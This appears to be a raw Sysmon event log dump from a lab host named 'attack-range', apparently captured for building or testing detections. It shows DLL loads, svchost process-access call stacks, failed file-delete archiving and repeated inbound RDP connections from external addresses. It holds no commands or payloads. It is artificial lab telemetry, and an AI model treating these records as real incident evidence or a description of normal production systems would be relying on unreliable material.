Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000099543Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.084{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000099542Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.084{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000099541Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.084{326FD73D-C0F4-6294-3E0B-000000005502}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099571Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099570Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099569Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099568Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099567Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099566Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099565Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A441-6294-EB00-000000005502}4800C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099564Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44C-6294-0401-000000005502}4872C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099563Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44C-6294-0401-000000005502}4872C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099562Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44C-6294-0401-000000005502}4872C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099561Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44C-6294-0401-000000005502}4872C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099560Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44C-6294-0401-000000005502}4872C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099559Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44C-6294-0401-000000005502}4872C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099558Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099557Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099556Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099555Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099554Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099553Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099552Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:54.224{326FD73D-A254-6294-0D00-000000005502}908932C:\Windows\system32\svchost.exe{326FD73D-A44B-6294-FD00-000000005502}580C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000099588Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:55.678{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D39D09D6EEB3EC3A67F544E77A72D6E8,SHA256=28EA65471F48D17011AFBDBA8B22DEB4509730B29287342434B43CD98D6D1E17,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099590Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:56.771{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C8A82B711EBF1E3D03D0F05AA68F588,SHA256=22D1A706357EB8636C9EAAC7FF86C1A0BF061914CF71BFCB499087273669E229,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099589Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:56.724{326FD73D-A45C-6294-5601-000000005502}6368NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F67B77B3F79B4F0D16AC798789EF3ED8,SHA256=13DD50B6BFB17EA237EA6A6B93484F9DF2620FEBABCE10D2C53BB633B6DFC95A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099594Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:57.771{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DC1201B19DE883D59A0A506DB0A6149,SHA256=F3BA2249FAA95743B02E2560BC9A471C11D8EB241EFD8A1F4069DA6361507A75,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099593Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:53.804{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-35102-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099592Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:53.172{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-34086-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099591Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:52.994{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-33776-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 
23542300x800000000000000099597Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:58.865{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64C5612A45EBBD592BFDD806E03BFEC3,SHA256=81FEE535210FDD4018C0C67B49A4356DF3051E158E7EFA6872283CAC80AE612E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099596Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:54.080{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-35526-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099595Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:53.882{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-35214-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 23542300x800000000000000099607Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:59.959{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77678612AA80AE6C9411193B056050B9,SHA256=9A94717EF816D26481343D69D043A5805E431DB8C6A2D151B2603FD38E6B536E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099606Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:04:55.919{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-38606-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099605Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:55.911{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-51466-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099604Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:55.712{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-38272-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099603Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:55.635{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-38138-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099602Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:55.597{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-50848-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099601Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:55.469{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-50606-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 
